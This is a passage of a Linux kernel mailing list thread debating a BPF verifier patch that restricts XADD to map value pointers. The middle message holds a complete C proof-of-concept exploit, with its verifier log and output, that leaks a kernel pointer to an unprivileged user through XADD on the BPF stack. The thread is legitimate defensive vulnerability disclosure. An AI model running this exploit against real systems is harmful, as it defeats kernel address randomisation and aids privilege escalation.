Message ID | 20200415204743.206086-1-jannh@google.com |
---|---|
State | Changes Requested |
Delegated to: | BPF Maintainers |
Headers | show |
Series | [bpf] bpf: Use pointer type whitelist for XADD | expand |
> On Apr 15, 2020, at 1:47 PM, Jann Horn <jannh@google.com> wrote: > > At the moment, check_xadd() uses a blacklist to decide whether a given > pointer type should be usable with the XADD instruction. Out of all the > pointer types that check_mem_access() accepts, only four are currently let > through by check_xadd(): > > PTR_TO_MAP_VALUE > PTR_TO_CTX rejected > PTR_TO_STACK > PTR_TO_PACKET rejected > PTR_TO_PACKET_META rejected > PTR_TO_FLOW_KEYS rejected > PTR_TO_SOCKET rejected > PTR_TO_SOCK_COMMON rejected > PTR_TO_TCP_SOCK rejected > PTR_TO_XDP_SOCK rejected > PTR_TO_TP_BUFFER > PTR_TO_BTF_ID > > Looking at the currently permitted ones: > > - PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for XADD. > - PTR_TO_STACK: This doesn't make much sense, there is no concurrency on > the BPF stack. It also causes confusion further down, because the first > check_mem_access() won't check whether the stack slot being read from is > STACK_SPILL and the second check_mem_access() assumes in > check_stack_write() that the value being written is a normal scalar. > This means that unprivileged users can leak kernel pointers. > - PTR_TO_TP_BUFFER: This is a local output buffer without concurrency. > - PTR_TO_BTF_ID: This is read-only, XADD can't work. When the verifier > tries to verify XADD on such memory, the first check_ptr_to_btf_access() > invocation gets confused by value_regno not being a valid array index > and writes to out-of-bounds memory. > > Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't make > sense, and is sometimes broken on top of that. > > Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)") > Signed-off-by: Jann Horn <jannh@google.com> > --- > I'm just sending this on the public list, since the worst-case impact for > non-root users is leaking kernel pointers to userspace. In a context where > you can reach BPF (no sandboxing), I don't think that kernel ASLR is very > effective at the moment anyway. IIUC, this is to fix leaking kernel pointers? If this is accurate, we should include this information in the commit log. > > This breaks ten unit tests that assume that XADD is possible on the stack, > and I'm not sure how all of them should be fixed up; I'd appreciate it if > someone else could figure out how to fix them. I think some of them might > be using XADD to cast pointers to numbers, or something like that? But I'm > not sure. Could you please list which tests are broken by this? We need to be careful because some tools probably depend on this. Thanks, Song
On Wed, Apr 15, 2020 at 10:47:43PM +0200, Jann Horn wrote: > At the moment, check_xadd() uses a blacklist to decide whether a given > pointer type should be usable with the XADD instruction. Out of all the > pointer types that check_mem_access() accepts, only four are currently let > through by check_xadd(): > > PTR_TO_MAP_VALUE > PTR_TO_CTX rejected > PTR_TO_STACK > PTR_TO_PACKET rejected > PTR_TO_PACKET_META rejected > PTR_TO_FLOW_KEYS rejected > PTR_TO_SOCKET rejected > PTR_TO_SOCK_COMMON rejected > PTR_TO_TCP_SOCK rejected > PTR_TO_XDP_SOCK rejected > PTR_TO_TP_BUFFER > PTR_TO_BTF_ID > > Looking at the currently permitted ones: > > - PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for XADD. > - PTR_TO_STACK: This doesn't make much sense, there is no concurrency on > the BPF stack. It also causes confusion further down, because the first > check_mem_access() won't check whether the stack slot being read from is > STACK_SPILL and the second check_mem_access() assumes in > check_stack_write() that the value being written is a normal scalar. > This means that unprivileged users can leak kernel pointers. > - PTR_TO_TP_BUFFER: This is a local output buffer without concurrency. > - PTR_TO_BTF_ID: This is read-only, XADD can't work. When the verifier > tries to verify XADD on such memory, the first check_ptr_to_btf_access() > invocation gets confused by value_regno not being a valid array index > and writes to out-of-bounds memory. > Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't make > sense, and is sometimes broken on top of that. > > Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)") > Signed-off-by: Jann Horn <jannh@google.com> > --- > I'm just sending this on the public list, since the worst-case impact for > non-root users is leaking kernel pointers to userspace. In a context where > you can reach BPF (no sandboxing), I don't think that kernel ASLR is very > effective at the moment anyway. > > This breaks ten unit tests that assume that XADD is possible on the stack, > and I'm not sure how all of them should be fixed up; I'd appreciate it if > someone else could figure out how to fix them. I think some of them might > be using XADD to cast pointers to numbers, or something like that? But I'm > not sure. > > Or is XADD on the stack actually something you want to support for some > reason, meaning that that part would have to be fixed differently? yeah. 'doesnt make sense' is relative. I prefer to fix the issues instead of disabling them. xadd to PTR_TO_STACK, PTR_TO_TP_BUFFER, PTR_TO_BTF_ID should all work because they are direct pointers to objects. Unlike pointer to ctx and flow_key that will be rewritten and are not direct pointers. Short term I think it's fine to disable PTR_TO_TP_BUFFER because prog breakage is unlikely (if it's actually broken which I'm not sure yet). But PTR_TO_BTF_ID and PTR_TO_STACK should be fixed. The former could be used in bpf-tcp-cc progs. I don't think it is now, but it's certainly conceivable. PTR_TO_STACK should continue to work because tests are using it. 'but stack has no concurrency' is not an excuse to break tests. Also I don't understand why you're saying that PTR_TO_STACK xadd is leaking. The first check_mem_access() will check for STACK_SPILL afaics.
On Thu, Apr 16, 2020 at 11:11 PM Alexei Starovoitov <alexei.starovoitov@gmail.com> wrote: > On Wed, Apr 15, 2020 at 10:47:43PM +0200, Jann Horn wrote: > > At the moment, check_xadd() uses a blacklist to decide whether a given > > pointer type should be usable with the XADD instruction. Out of all the > > pointer types that check_mem_access() accepts, only four are currently let > > through by check_xadd(): > > > > PTR_TO_MAP_VALUE > > PTR_TO_CTX rejected > > PTR_TO_STACK > > PTR_TO_PACKET rejected > > PTR_TO_PACKET_META rejected > > PTR_TO_FLOW_KEYS rejected > > PTR_TO_SOCKET rejected > > PTR_TO_SOCK_COMMON rejected > > PTR_TO_TCP_SOCK rejected > > PTR_TO_XDP_SOCK rejected > > PTR_TO_TP_BUFFER > > PTR_TO_BTF_ID > > > > Looking at the currently permitted ones: > > > > - PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for XADD. > > - PTR_TO_STACK: This doesn't make much sense, there is no concurrency on > > the BPF stack. It also causes confusion further down, because the first > > check_mem_access() won't check whether the stack slot being read from is > > STACK_SPILL and the second check_mem_access() assumes in > > check_stack_write() that the value being written is a normal scalar. > > This means that unprivileged users can leak kernel pointers. > > - PTR_TO_TP_BUFFER: This is a local output buffer without concurrency. > > - PTR_TO_BTF_ID: This is read-only, XADD can't work. When the verifier > > tries to verify XADD on such memory, the first check_ptr_to_btf_access() > > invocation gets confused by value_regno not being a valid array index > > and writes to out-of-bounds memory. > > > Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't make > > sense, and is sometimes broken on top of that. > > > > Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)") > > Signed-off-by: Jann Horn <jannh@google.com> > > --- > > I'm just sending this on the public list, since the worst-case impact for > > non-root users is leaking kernel pointers to userspace. In a context where > > you can reach BPF (no sandboxing), I don't think that kernel ASLR is very > > effective at the moment anyway. > > > > This breaks ten unit tests that assume that XADD is possible on the stack, > > and I'm not sure how all of them should be fixed up; I'd appreciate it if > > someone else could figure out how to fix them. I think some of them might > > be using XADD to cast pointers to numbers, or something like that? But I'm > > not sure. > > > > Or is XADD on the stack actually something you want to support for some > > reason, meaning that that part would have to be fixed differently? > > yeah. 'doesnt make sense' is relative. > I prefer to fix the issues instead of disabling them. > xadd to PTR_TO_STACK, PTR_TO_TP_BUFFER, PTR_TO_BTF_ID should all work > because they are direct pointers to objects. PTR_TO_STACK and PTR_TO_TP_BUFFER I can sort of understand. But PTR_TO_BTF_ID is always readonly, so XADD on PTR_TO_BTF_ID really doesn't make any sense AFAICS. > Unlike pointer to ctx and flow_key that will be rewritten and are not > direct pointers. > > Short term I think it's fine to disable PTR_TO_TP_BUFFER because > prog breakage is unlikely (if it's actually broken which I'm not sure yet). > But PTR_TO_BTF_ID and PTR_TO_STACK should be fixed. > The former could be used in bpf-tcp-cc progs. I don't think it is now, > but it's certainly conceivable. > PTR_TO_STACK should continue to work because tests are using it. > 'but stack has no concurrency' is not an excuse to break tests. Meh, if you insist, I guess I can patch it differently. Although I really think that "tests abuse it as a hack" shouldn't be a reason to keep around functionality that doesn't make sense for production use. > Also I don't understand why you're saying that PTR_TO_STACK xadd is leaking. > The first check_mem_access() will check for STACK_SPILL afaics. Nope. check_stack_read() checks for STACK_SPILL, but it doesn't do anything special with that information. user@vm:~/test/bpf-xadd-pointer-leak$ cat bpf-pointer-leak.c #define _GNU_SOURCE #include <pthread.h> #include <err.h> #include <errno.h> #include <sched.h> #include <stdio.h> #include <unistd.h> #include <linux/bpf.h> #include <linux/filter.h> #include <linux/prctl.h> #include <sys/syscall.h> #include <stdint.h> #include <sys/socket.h> #include <string.h> #include <poll.h> #include <sys/uio.h> #include <fcntl.h> #define GPLv2 "GPL v2" #define ARRSIZE(x) (sizeof(x) / sizeof((x)[0])) /* registers */ /* caller-saved: r0..r5 */ #define BPF_REG_ARG1 BPF_REG_1 #define BPF_REG_ARG2 BPF_REG_2 #define BPF_REG_ARG3 BPF_REG_3 #define BPF_REG_ARG4 BPF_REG_4 #define BPF_REG_ARG5 BPF_REG_5 #define BPF_REG_CTX BPF_REG_6 #define BPF_REG_FP BPF_REG_10 #define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_DW | BPF_IMM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = (__u32) (IMM) }), \ ((struct bpf_insn) { \ .code = 0, /* zero is reserved opcode */ \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = ((__u64) (IMM)) >> 32 }) #define BPF_LD_MAP_FD(DST, MAP_FD) \ BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) #define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_MOV64_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_ALU64_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_ALU32_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ ((struct bpf_insn) { \ .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_EMIT_CALL(FUNC) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_CALL, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = (FUNC) }) #define BPF_JMP_IMM(OP, DST, IMM, OFF) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_EXIT_INSN() \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_EXIT, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = 0 }) #define BPF_LD_ABS(SIZE, IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_ALU64_REG(OP, DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_MOV64_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) int bpf_(int cmd, union bpf_attr *attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int array_create(int value_size, int num_entries) { union bpf_attr create_map_attrs = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = 4, .value_size = value_size, .max_entries = num_entries }; int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs); if (mapfd == -1) err(1, "map create"); return mapfd; } unsigned long get_ulong(int map_fd, uint64_t idx) { uint64_t value; union bpf_attr lookup_map_attrs = { .map_fd = map_fd, .key = (uint64_t)&idx, .value = (uint64_t)&value }; if (bpf_(BPF_MAP_LOOKUP_ELEM, &lookup_map_attrs)) err(1, "MAP_LOOKUP_ELEM"); return value; } int prog_load(struct bpf_insn *insns, size_t insns_count) { char verifier_log[100000]; union bpf_attr create_prog_attrs = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = insns_count, .insns = (uint64_t)insns, .license = (uint64_t)GPLv2, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log }; int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs); int errno_ = errno; printf("==========================\n%s==========================\n", verifier_log); errno = errno_; if (progfd == -1) err(1, "prog load"); return progfd; } int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) { int progfd = prog_load(insns, insns_count); // hook eBPF program up to a socket // sendmsg() to the socket will trigger the filter // returning 0 in the filter should toss the packet int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) err(1, "socketpair"); if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) err(1, "setsockopt"); return socks[1]; } void trigger_proc(int sockfd) { if (write(sockfd, "X", 1) != 1) err(1, "write to proc socket failed"); } int main(void) { int small_map = array_create(8, 1); struct bpf_insn insns[] = { // r7 = map_pointer BPF_LD_MAP_FD(BPF_REG_7, small_map), // r8 = launder(map_pointer) BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_7, -8), BPF_MOV64_IMM(BPF_REG_1, 0), ((struct bpf_insn) { .code = BPF_STX | BPF_DW | BPF_XADD, .dst_reg = BPF_REG_FP, .src_reg = BPF_REG_1, .off = -8 }), BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_FP, -8), // store r8 into map BPF_MOV64_REG(BPF_REG_ARG1, BPF_REG_7), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4), BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0), BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN() }; int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns)); trigger_proc(sock_fd); printf("map[0] = 0x%lx\n", get_ulong(small_map, 0)); } user@vm:~/test/bpf-xadd-pointer-leak$ gcc -o bpf-pointer-leak bpf-pointer-leak.c user@vm:~/test/bpf-xadd-pointer-leak$ ./bpf-pointer-leak ========================== func#0 @0 0: R1=ctx(id=0,off=0,imm=0) R10=fp0 0: (18) r7 = 0x0 2: R1=ctx(id=0,off=0,imm=0) R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0 2: (7b) *(u64 *)(r10 -8) = r7 3: R1=ctx(id=0,off=0,imm=0) R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0 fp-8_w=map_ptr 3: (b7) r1 = 0 4: R1_w=invP0 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0 fp-8_w=map_ptr 4: (db) lock *(u64 *)(r10 -8) += r1 5: R1_w=invP0 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0 fp-8_w=mmmmmmmm 5: (79) r8 = *(u64 *)(r10 -8) 6: R1_w=invP0 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm 6: (bf) r1 = r7 7: R1_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm 7: (bf) r2 = r10 8: R1_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R2_w=fp0 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm 8: (07) r2 += -4 9: R1_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R2_w=fp-4 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm 9: (62) *(u32 *)(r2 +0) = 0 10: R1_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R2_w=fp-4 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm 10: (85) call bpf_map_lookup_elem#1 11: R0_w=map_value_or_null(id=1,off=0,ks=4,vs=8,imm=0) R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm 11: (55) if r0 != 0x0 goto pc+1 R0_w=invP0 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm 12: R0_w=invP0 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm 12: (95) exit 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R7=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8=invP(id=0) R10=fp0 fp-8=mmmmmmmm 13: (7b) *(u64 *)(r0 +0) = r8 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R7=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8=invP(id=0) R10=fp0 fp-8=mmmmmmmm 14: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R7=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8=invP(id=0) R10=fp0 fp-8=mmmmmmmm 14: (b7) r0 = 0 15: R0_w=invP0 R7=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8=invP(id=0) R10=fp0 fp-8=mmmmmmmm 15: (95) exit processed 15 insns (limit 1000000) max_states_per_insn 0 total_states 1 peak_states 1 mark_read 1 ========================== map[0] = 0xffff888067ffa800 user@vm:~/test/bpf-xadd-pointer-leak$
On Fri, Apr 17, 2020 at 12:34:42AM +0200, Jann Horn wrote: > On Thu, Apr 16, 2020 at 11:11 PM Alexei Starovoitov > <alexei.starovoitov@gmail.com> wrote: > > On Wed, Apr 15, 2020 at 10:47:43PM +0200, Jann Horn wrote: > > > At the moment, check_xadd() uses a blacklist to decide whether a given > > > pointer type should be usable with the XADD instruction. Out of all the > > > pointer types that check_mem_access() accepts, only four are currently let > > > through by check_xadd(): > > > > > > PTR_TO_MAP_VALUE > > > PTR_TO_CTX rejected > > > PTR_TO_STACK > > > PTR_TO_PACKET rejected > > > PTR_TO_PACKET_META rejected > > > PTR_TO_FLOW_KEYS rejected > > > PTR_TO_SOCKET rejected > > > PTR_TO_SOCK_COMMON rejected > > > PTR_TO_TCP_SOCK rejected > > > PTR_TO_XDP_SOCK rejected > > > PTR_TO_TP_BUFFER > > > PTR_TO_BTF_ID > > > > > > Looking at the currently permitted ones: > > > > > > - PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for XADD. > > > - PTR_TO_STACK: This doesn't make much sense, there is no concurrency on > > > the BPF stack. It also causes confusion further down, because the first > > > check_mem_access() won't check whether the stack slot being read from is > > > STACK_SPILL and the second check_mem_access() assumes in > > > check_stack_write() that the value being written is a normal scalar. > > > This means that unprivileged users can leak kernel pointers. > > > - PTR_TO_TP_BUFFER: This is a local output buffer without concurrency. > > > - PTR_TO_BTF_ID: This is read-only, XADD can't work. When the verifier > > > tries to verify XADD on such memory, the first check_ptr_to_btf_access() > > > invocation gets confused by value_regno not being a valid array index > > > and writes to out-of-bounds memory. > > > > > Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't make > > > sense, and is sometimes broken on top of that. > > > > > > Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)") > > > Signed-off-by: Jann Horn <jannh@google.com> > > > --- > > > I'm just sending this on the public list, since the worst-case impact for > > > non-root users is leaking kernel pointers to userspace. In a context where > > > you can reach BPF (no sandboxing), I don't think that kernel ASLR is very > > > effective at the moment anyway. > > > > > > This breaks ten unit tests that assume that XADD is possible on the stack, > > > and I'm not sure how all of them should be fixed up; I'd appreciate it if > > > someone else could figure out how to fix them. I think some of them might > > > be using XADD to cast pointers to numbers, or something like that? But I'm > > > not sure. > > > > > > Or is XADD on the stack actually something you want to support for some > > > reason, meaning that that part would have to be fixed differently? > > > > yeah. 'doesnt make sense' is relative. > > I prefer to fix the issues instead of disabling them. > > xadd to PTR_TO_STACK, PTR_TO_TP_BUFFER, PTR_TO_BTF_ID should all work > > because they are direct pointers to objects. > > PTR_TO_STACK and PTR_TO_TP_BUFFER I can sort of understand. But > PTR_TO_BTF_ID is always readonly, so XADD on PTR_TO_BTF_ID really > doesn't make any sense AFAICS. Not quite. See bpf_tcp_ca_btf_struct_access(). Few fields of one specific 'struct tcp_sock' are whitelisted for write. > > > Unlike pointer to ctx and flow_key that will be rewritten and are not > > direct pointers. > > > > Short term I think it's fine to disable PTR_TO_TP_BUFFER because > > prog breakage is unlikely (if it's actually broken which I'm not sure yet). > > But PTR_TO_BTF_ID and PTR_TO_STACK should be fixed. > > The former could be used in bpf-tcp-cc progs. I don't think it is now, > > but it's certainly conceivable. > > PTR_TO_STACK should continue to work because tests are using it. > > 'but stack has no concurrency' is not an excuse to break tests. > > Meh, if you insist, I guess I can patch it differently. Although I > really think that "tests abuse it as a hack" shouldn't be a reason to > keep around functionality that doesn't make sense for production use. The pointer could have reached __sync_fetch_and_add() via two different paths just to simplify the C code: if (..) my_value = lookup(); else my_value = &my_init_value; __sync_fetch_and_add(&my_init_value->counter, 1);
On Fri, Apr 17, 2020 at 2:41 AM Alexei Starovoitov <alexei.starovoitov@gmail.com> wrote: > On Fri, Apr 17, 2020 at 12:34:42AM +0200, Jann Horn wrote: > > On Thu, Apr 16, 2020 at 11:11 PM Alexei Starovoitov > > <alexei.starovoitov@gmail.com> wrote: > > > On Wed, Apr 15, 2020 at 10:47:43PM +0200, Jann Horn wrote: > > > > At the moment, check_xadd() uses a blacklist to decide whether a given > > > > pointer type should be usable with the XADD instruction. Out of all the > > > > pointer types that check_mem_access() accepts, only four are currently let > > > > through by check_xadd(): > > > > > > > > PTR_TO_MAP_VALUE > > > > PTR_TO_CTX rejected > > > > PTR_TO_STACK > > > > PTR_TO_PACKET rejected > > > > PTR_TO_PACKET_META rejected > > > > PTR_TO_FLOW_KEYS rejected > > > > PTR_TO_SOCKET rejected > > > > PTR_TO_SOCK_COMMON rejected > > > > PTR_TO_TCP_SOCK rejected > > > > PTR_TO_XDP_SOCK rejected > > > > PTR_TO_TP_BUFFER > > > > PTR_TO_BTF_ID > > > > > > > > Looking at the currently permitted ones: > > > > > > > > - PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for XADD. > > > > - PTR_TO_STACK: This doesn't make much sense, there is no concurrency on > > > > the BPF stack. It also causes confusion further down, because the first > > > > check_mem_access() won't check whether the stack slot being read from is > > > > STACK_SPILL and the second check_mem_access() assumes in > > > > check_stack_write() that the value being written is a normal scalar. > > > > This means that unprivileged users can leak kernel pointers. > > > > - PTR_TO_TP_BUFFER: This is a local output buffer without concurrency. > > > > - PTR_TO_BTF_ID: This is read-only, XADD can't work. When the verifier > > > > tries to verify XADD on such memory, the first check_ptr_to_btf_access() > > > > invocation gets confused by value_regno not being a valid array index > > > > and writes to out-of-bounds memory. > > > > > > > Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't make > > > > sense, and is sometimes broken on top of that. > > > > > > > > Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)") > > > > Signed-off-by: Jann Horn <jannh@google.com> > > > > --- > > > > I'm just sending this on the public list, since the worst-case impact for > > > > non-root users is leaking kernel pointers to userspace. In a context where > > > > you can reach BPF (no sandboxing), I don't think that kernel ASLR is very > > > > effective at the moment anyway. > > > > > > > > This breaks ten unit tests that assume that XADD is possible on the stack, > > > > and I'm not sure how all of them should be fixed up; I'd appreciate it if > > > > someone else could figure out how to fix them. I think some of them might > > > > be using XADD to cast pointers to numbers, or something like that? But I'm > > > > not sure. > > > > > > > > Or is XADD on the stack actually something you want to support for some > > > > reason, meaning that that part would have to be fixed differently? > > > > > > yeah. 'doesnt make sense' is relative. > > > I prefer to fix the issues instead of disabling them. > > > xadd to PTR_TO_STACK, PTR_TO_TP_BUFFER, PTR_TO_BTF_ID should all work > > > because they are direct pointers to objects. > > > > PTR_TO_STACK and PTR_TO_TP_BUFFER I can sort of understand. But > > PTR_TO_BTF_ID is always readonly, so XADD on PTR_TO_BTF_ID really > > doesn't make any sense AFAICS. > > Not quite. See bpf_tcp_ca_btf_struct_access(). Few fields of one specific > 'struct tcp_sock' are whitelisted for write. Oh... but that kind of thing is not really safe, right? While there aren't really any pointers to struct tcp_sock in the kernel, I've noticed that there are also some helpers that take ARG_PTR_TO_BTF_ID arguments, which is kind of similar; and those look like it wouldn't be hard for root to abuse them to corrupt kernel memory. E.g. bpf_skb_output_proto is reachable from tracing programs, so I expect that it'd be pretty easy to corrupt kernel memory with that. As far as I can tell, fundamentally, BPF must not write through BTF pointers because the BPF verifier can't guarantee that BTF pointers actually point to the type they're supposed to point to. > > > Unlike pointer to ctx and flow_key that will be rewritten and are not > > > direct pointers. > > > > > > Short term I think it's fine to disable PTR_TO_TP_BUFFER because > > > prog breakage is unlikely (if it's actually broken which I'm not sure yet). > > > But PTR_TO_BTF_ID and PTR_TO_STACK should be fixed. > > > The former could be used in bpf-tcp-cc progs. I don't think it is now, > > > but it's certainly conceivable. > > > PTR_TO_STACK should continue to work because tests are using it. > > > 'but stack has no concurrency' is not an excuse to break tests. > > > > Meh, if you insist, I guess I can patch it differently. Although I > > really think that "tests abuse it as a hack" shouldn't be a reason to > > keep around functionality that doesn't make sense for production use. > > The pointer could have reached __sync_fetch_and_add() via two different paths > just to simplify the C code: > if (..) > my_value = lookup(); > else > my_value = &my_init_value; > __sync_fetch_and_add(&my_init_value->counter, 1); Yeah, okay, I guess that could happen.
On Thu, Apr 16, 2020 at 6:40 PM Jann Horn <jannh@google.com> wrote: > > On Fri, Apr 17, 2020 at 2:41 AM Alexei Starovoitov > <alexei.starovoitov@gmail.com> wrote: > > On Fri, Apr 17, 2020 at 12:34:42AM +0200, Jann Horn wrote: > > > On Thu, Apr 16, 2020 at 11:11 PM Alexei Starovoitov > > > <alexei.starovoitov@gmail.com> wrote: > > > > On Wed, Apr 15, 2020 at 10:47:43PM +0200, Jann Horn wrote: > > > > > At the moment, check_xadd() uses a blacklist to decide whether a given > > > > > pointer type should be usable with the XADD instruction. Out of all the > > > > > pointer types that check_mem_access() accepts, only four are currently let > > > > > through by check_xadd(): > > > > > > > > > > PTR_TO_MAP_VALUE > > > > > PTR_TO_CTX rejected > > > > > PTR_TO_STACK > > > > > PTR_TO_PACKET rejected > > > > > PTR_TO_PACKET_META rejected > > > > > PTR_TO_FLOW_KEYS rejected > > > > > PTR_TO_SOCKET rejected > > > > > PTR_TO_SOCK_COMMON rejected > > > > > PTR_TO_TCP_SOCK rejected > > > > > PTR_TO_XDP_SOCK rejected > > > > > PTR_TO_TP_BUFFER > > > > > PTR_TO_BTF_ID > > > > > > > > > > Looking at the currently permitted ones: > > > > > > > > > > - PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for XADD. > > > > > - PTR_TO_STACK: This doesn't make much sense, there is no concurrency on > > > > > the BPF stack. It also causes confusion further down, because the first > > > > > check_mem_access() won't check whether the stack slot being read from is > > > > > STACK_SPILL and the second check_mem_access() assumes in > > > > > check_stack_write() that the value being written is a normal scalar. > > > > > This means that unprivileged users can leak kernel pointers. > > > > > - PTR_TO_TP_BUFFER: This is a local output buffer without concurrency. > > > > > - PTR_TO_BTF_ID: This is read-only, XADD can't work. When the verifier > > > > > tries to verify XADD on such memory, the first check_ptr_to_btf_access() > > > > > invocation gets confused by value_regno not being a valid array index > > > > > and writes to out-of-bounds memory. > > > > > > > > > Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't make > > > > > sense, and is sometimes broken on top of that. > > > > > > > > > > Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)") > > > > > Signed-off-by: Jann Horn <jannh@google.com> > > > > > --- > > > > > I'm just sending this on the public list, since the worst-case impact for > > > > > non-root users is leaking kernel pointers to userspace. In a context where > > > > > you can reach BPF (no sandboxing), I don't think that kernel ASLR is very > > > > > effective at the moment anyway. > > > > > > > > > > This breaks ten unit tests that assume that XADD is possible on the stack, > > > > > and I'm not sure how all of them should be fixed up; I'd appreciate it if > > > > > someone else could figure out how to fix them. I think some of them might > > > > > be using XADD to cast pointers to numbers, or something like that? But I'm > > > > > not sure. > > > > > > > > > > Or is XADD on the stack actually something you want to support for some > > > > > 